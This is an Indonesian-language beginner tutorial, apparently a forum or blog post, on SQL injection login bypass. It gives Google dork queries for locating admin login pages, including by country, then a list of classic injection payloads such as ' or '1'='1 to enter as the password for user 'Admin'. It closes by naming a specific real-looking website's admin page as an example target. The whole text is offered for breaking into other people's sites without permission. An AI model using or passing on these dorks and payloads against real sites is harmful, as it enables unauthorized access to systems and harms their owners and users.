Basic sql injection (Mendapatkan auth bypass di account admin)

ok buat yg udah jago lewati aja  ini untuk yg baru belajar sql injection kayak gw

Pertama kita perlu menemukan situs 2 yg vulnerable, mulailah  googlling  kita ketik dork  "defenition of dork" 'entri pencarian untuk jenis tertentu dari site/exploit .ect"Ada banyak dork google untuk basic sql injection di bawah ini  yang terbaik:

"inurl:admin.asp"
"inurl:admin.php"
"inurl:login/admin.asp"
"inurl:login/admin.php"
"inurl:admin/login.asp"
"inurl:admin/login.php"
"inurl:adminlogin.asp"
"inurl:adminlogin.php"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:admin_login.php"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

kalau ingin cari situs negara tertentu tingal tambahin aja Nama Domain negara. contoh kalau negara malay (my) jd seperti ini "inurl:my/admin/login.asp"  atau gini "inurl:my/admin/login"

Sekarang apa yang harus dilakukan setelah kita mendapatkan situs target.
situs harus terlihat seperti ini:
welcome to xxxxxxxxxx administrator panel
username :
password :

untuk username ketik "Admin" tanpa tanda kutip dan untuk password our sql injection
di bawah ini ada daftar sql injections yg bisa anda gunakan

' or '1'='1

' or 'a'='a

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

masih banyak lagi tetapi ini adalah yang terbaik yang saya tahu
dan apa yang dilakukan sql injection ini akan membingungkan  database sampai memberikan auth.
bypass Jadi masukan Anda akan terlihat seperti ini

username:Admin
password:'or'1'='1

klik submit dan you'r 
CATATAN tidak semua situs vulnerable/ rentan.

contoh http://www.furniturevictoria.com/admin/ username:admin password:'or'1'='1 dan liat hasilnya http://www.furniturevictoria.com/